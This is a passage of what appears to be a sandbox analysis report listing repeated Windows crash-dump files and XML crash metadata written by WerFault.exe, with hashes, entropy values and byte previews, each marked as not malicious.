                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:04 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):93648
                  Entropy (8bit):1.8831032145015207
                  Encrypted:false
                  SSDEEP:384:Sa54bteGzo6rX/gGjViSLNbMV3i5ViF15mcuXCWfEsQ:0eGzjX/rLNuWfEL
                  MD5:468700A3FA4D49728906EE9626C392C3
                  SHA1:D21B302F033AADD50C141D1A6142DA65613BF88E
                  SHA-256:F6065B31E4811D99F215845CDA965B4BCA9E687730F9B8D9D7C1C8E635D3705A
                  SHA-512:4BCC2EDC7D867298C6537EE5A4DD9394EFE4E1C4ED658BBC9CE9CFA03D5590CE5B7AE552DE3B0F9747F8334B997F51BFA52C78B6BD38C05B62729A9FB88FF504
                  Malicious:false
                  Preview:MDMP....... .......P..d............................(.......$................G..........`.......8...........T...........`#..pJ...........................................................................................U...........B....... ......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.7030271274777906
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiqo6dp6YyQSUfmhCiGgmf/S8+pBT89bxnnsfYR7m:RrlsNiV6z6YFSUfeOgmf/SmxnsfF
                  MD5:58C076FA680E3F74C1C977CA52ACE39A
                  SHA1:06EE543369E2E3220B362DDBB54F56E99E3C768F
                  SHA-256:637EA571EF692AFFE376A7270352E5540F82FE3EDCC43AB42616256C0BF2BA86
                  SHA-512:708FAEFB0FC4132DDEBAA567AAF73F767CD158424166FC0F36CD8E19A54027A92DC0E52616DCDE064CABB1058B15F9B7F230DC4863089DBD07188B70DF90AD07
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:05 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):102310
                  Entropy (8bit):1.9059104126606683
                  Encrypted:false
                  SSDEEP:384:QJp4xfeWLu+olTE1JbsJMCViSLNznXwXKqCm:QueWK+yEfBeLNMXH
                  MD5:C2DEA386B72C787670565957A8280CD0
                  SHA1:C68AC9EBAF8900EC2AB1FAE8CAD931EBB51C353E
                  SHA-256:4473B6F6DA0593A59F48DCF197C29F74513FEBBA1E67BB1751121D59463D205E
                  SHA-512:D8EBEE5F51B4D951E4F25CC3D7E732DAA292421CFFEB47BCE4051AB54F3EEDB74301EA7AD30DD399478EB025ED876ACAC457A90F54EE002D97AB5BF2BD47AC6B
                  Malicious:false
                  Preview:MDMP....... .......Q..d............D...............X.......$...........4....J..........`.......8...........T............&...i..........,............ ...................................................................U...........B....... ......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8338
                  Entropy (8bit):3.7032874302459597
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiq36Om6YycSUfmWgmfvSFAjAK+pB+89bonnsfp4m:RrlsNi66Om6YpSUfHgmfvSFAjAjonsfT
                  MD5:30A4A9D0ACB5F823A04CD83D95C115AD
                  SHA1:A4DF67AFCF943CCA8A5CCDED637833276F18B53E
                  SHA-256:186838449F331A99736E2026407C7C152A4DCDB8E51F722A3D2DE755A974909A
                  SHA-512:774B144AD22896585D5B15D6FFD6FD9331929E25637AE9D4A1B09D873D8B44CA129351B005813164230BB93390E1B6BF2C056DABEB3E2408A2456754699DBCD5
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:06 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):96792
                  Entropy (8bit):1.927102615991072
                  Encrypted:false
                  SSDEEP:384:DO54YvejUyu+oqfNJbDlCViSLNYsY59uurjRvZKRB:D0ejUz+rHZeLNgjJ8B
                  MD5:EE4FD10706490F9F2682CF51B5C523E8
                  SHA1:79EF3AEA3875745DD408FB761832A30A807385EA
                  SHA-256:B0260FBF33804BA53D6C3D0CF45ECD7E92BF56F8A932CC4B5233D980A61F9D3F
                  SHA-512:44EE7EC8322625ECB233805ED1104AFB25F0D5E176645A86532C1C6D474BDB4C70E849C25286FE97F336D31095F567A603BB3FAF6944EA0B2B9734BCC980586F
                  Malicious:false
                  Preview:MDMP....... .......R..d............................(.......$...........D....G..........`.......8...........T............%..`T...........................................................................................U...........B....... ......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.7042963845410117
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiqG6a6YyiSUSmhUrgmf/S8+pBy89bjnnsfKhm:RrlsNib6a6Y3SUSeAgmf/SpjnsfV
                  MD5:128DCD6D11F41A0B824C751387A0905D
                  SHA1:24ABC7B06E8AFC34169901156D4F7A632BB22F9F
                  SHA-256:91D3939969FB4DDF80DE26F9938A84D0F9FA875C3485A430232770156871C2AC
                  SHA-512:427BA01539C1BB632C62C726F45E21564815AC2105234C296BAA7DFE7BCCD07281652EE0C1A2C9438FFB7C957C36BB8EC7705D8DA8F25DEF59142D42AC8635AD
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:07 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):105846
                  Entropy (8bit):1.9271813100119046
                  Encrypted:false
                  SSDEEP:384:PKsBSeCG/E1sciUmpASMmUo7APN+FWViSLNHdS53V/7O1LiFse:yer+/iUOA4sNAaLN6V/7OdiFs
                  MD5:92FDD427DD05136238AAC62202009E7F
                  SHA1:FD2CE6B9F6F7A606A57226E860F655D29ECE293A
                  SHA-256:88A7A49D330190284FDF59A6FE8F921FDA1D4D2975C16164B0E05E2FA315AFA4
                  SHA-512:ED523A48B41EEE9D08425C1B56B2BF8BC476C0B16704BA545FEE7798A0D940F6844CDFF2DA6208C6FD53953732E8DE94052D5AF72428C89CA7368B1F6631B0EB
                  Malicious:false
                  Preview:MDMP....... .......S..d............D...............X.......$...........4....L..........`.......8...........T............)...s....................... ...................................................................U...........B.......!......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.7045589887070745
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiq+6k6YyUSUbbfSgmf/S8+pBt89bMbnnsf3Kyjm:RrlsNiD6k6YBSUbbagmf/SoMbnsfH6
                  MD5:E5FC229AF4ACAC016157A8CE34EE87CA
                  SHA1:F811E62269A47E24FAF688D68A5A811D544796F3
                  SHA-256:B56222A664E3849E55C3B169568489E1B3EF0E0EE33DB5A9F1D425701106A1B8
                  SHA-512:F3EA029C4D28743C82E0E601F1E001BCB1BEE58EE3BF0B3FFD3428A3CB7EAFB0EA311F48CFD42A7C795B0B23E8D1555D4357A05F609D1EFED63A0CDFF196FCCD
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:08 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):117106
                  Entropy (8bit):1.9945228666868058
                  Encrypted:false
                  SSDEEP:384:dJLYwwvseGh/r9h9Mm0r3T07YJo7CFWhpSLNbeK2Y4MiZ5bsx:AvseeTbXY3M0o7sXLNh4MiD
                  MD5:3C296B81085DF0B4C9349F743AC7B4BB
                  SHA1:E0FA8E031369C542BFC685F6BAF236C86C89AF8D
                  SHA-256:E0339C47042C9E966EEDF467DB0C2A7BD83701E01826B8FE8A87521B4823574B
                  SHA-512:A046BF7168E334A04567FEAC5CA08F0ABFA1667434E7FE328EA65D1530E6E4E56810F3829E71E5B3D68B73B7EF38191B60D6C9A768AE6AC500034F2B91DAD820
                  Malicious:false
                  Preview:MDMP....... .......T..d............t...........`...........$...........d....P..........`.......8...........T............1............... ...........!...................................................................U...........B......."......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8344
                  Entropy (8bit):3.7039124343330307
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiq/6X+1u56YycSUbbEDgmf/S8+pBp89bdnnsf9fm:RrlsNiC6yu56YZSUbbIgmf/Skdnsfo
                  MD5:CDC384320680A001CD98B7E11E4CE7ED
                  SHA1:0D8D7D36DAF075AAAE32A1D8A41B643B5FB14BD7
                  SHA-256:4BD3DB7267A807AB7A9621C4A34F4EE5A06714E5E90C1064265A02B10850ADCE
                  SHA-512:EBB573711BDD45C0159C15D3E0F91FA2979EE9EC3FEC1AAF6624A22542C6A51C3713FBAD0D3BFDE36B4CCEA068BEED2622C730F5694D4AFAEE858D3D5A8DB854
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:09 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):113434
                  Entropy (8bit):1.9540187805125897
                  Encrypted:false
                  SSDEEP:384:qB+8jgePFHQho9/t9T7d6F6ViiLN2Ejuut2ag2EtDa:ZePFHQ+5t9T6eLNz2t6
                  MD5:51CB853AF4BF8A9AFB31438D58CDF18A
                  SHA1:AFD8CE8F4EF79DBDB27986A83E4C853570AB48FA
                  SHA-256:0B96434E66EF50E67558F8497A06619108AACF80B5C8ED71A20CA9EA49D2C58E
                  SHA-512:B80DF4854AFB069FB840135F7465EA172AF5270549E58AC7781832BD31E8C292240AAEBDC5094C4736DA5B07EC489FA60BFCE347E55F8063FBBB085FE93261C5
                  Malicious:false
                  Preview:MDMP....... .......U..d............t.......................$...p"..........HS..........`.......8...........T...........H6.............."...........$...................................................................U...........B.......%......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8346
                  Entropy (8bit):3.703004005884765
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiqjV6S0O6YyUSUbbEDgmfvSFAjAK+pBT89bUnnsfEcm:RrlsNiMV646YRSUbbIgmfvSFAjAQUns+
                  MD5:FA167F86617ABCB41272953EC7CBC956
                  SHA1:997A45E280375B1023DBD11F9EC2730BD78BE895
                  SHA-256:A801DCE280D7F87F097C1D3A3F7C371229CD9D02311B2DF563764D3E870012B2
                  SHA-512:635D8CA59A2275324104A8796B9AE0E84FFBD106D791F4BC33599538F86DB849ACE0D2C9D9EED87634B9ED0FF0C9260F1222643BA582B3149E2A5018C0CB371F
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:17 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):113922
                  Entropy (8bit):1.942333682334088
                  Encrypted:false
                  SSDEEP:384:YB+8OSePqCV9hV9LjWxmiDOGViiLNGtImozFLFKXU:kePqE9DJjW3LNTmozxZ
                  MD5:DE5ACDDBF54CD23430BBAE24A232D56D
                  SHA1:6DD4967F5B12283FAEAAD52829637B08FCD0F74D
                  SHA-256:842B5D9DBF304EE33C89C02F4CDE96A6427C43CC50D1D900FB3E1AD19FED7715
                  SHA-512:6BFD737AA2A07B9B1365BA8FDCE15FD9E12CD01212C1F6EE9CB534DE8CE1EAD621C7D133FB4BABE7FAAE6397726FEA2D81CFD0BF3DD3352EA36B57F8E3613C59
                  Malicious:false
                  Preview:MDMP....... .......]..d............t.......................$...p"..........HS..........`.......8...........T...........H6..............."...........$...................................................................U...........B.......%......GenuineIntelW...........T...........K..d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8344
                  Entropy (8bit):3.7055723943567798
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNiqQ6mM6YywSUCZhgmf/S8+pBH89b7nnsfNpm:RrlsNil696Y1SUCfgmf/Sa7nsfK
                  MD5:A021F5B7435F694CED8C615BD289515E
                  SHA1:D3FB152BB470E0C6E976B5E634E81F32FA9BF572
                  SHA-256:018F8F58E6F98E8AEA94171F3D37A894020912A9FA19F6469EBDD0E8A316777C
                  SHA-512:E6797EC46073C196CA8835FC08706D61352BD6EF63981905111AD1FD3F39E4CB4FC7DAB3395BDE3FD1003E24D011AF0AD729E76B21C472C32C949CA11252B390
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.6.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Thu Aug 31 15:57:18 2023, 0x1205a4 type
                  Category:dropped
                  Size (bytes):113472
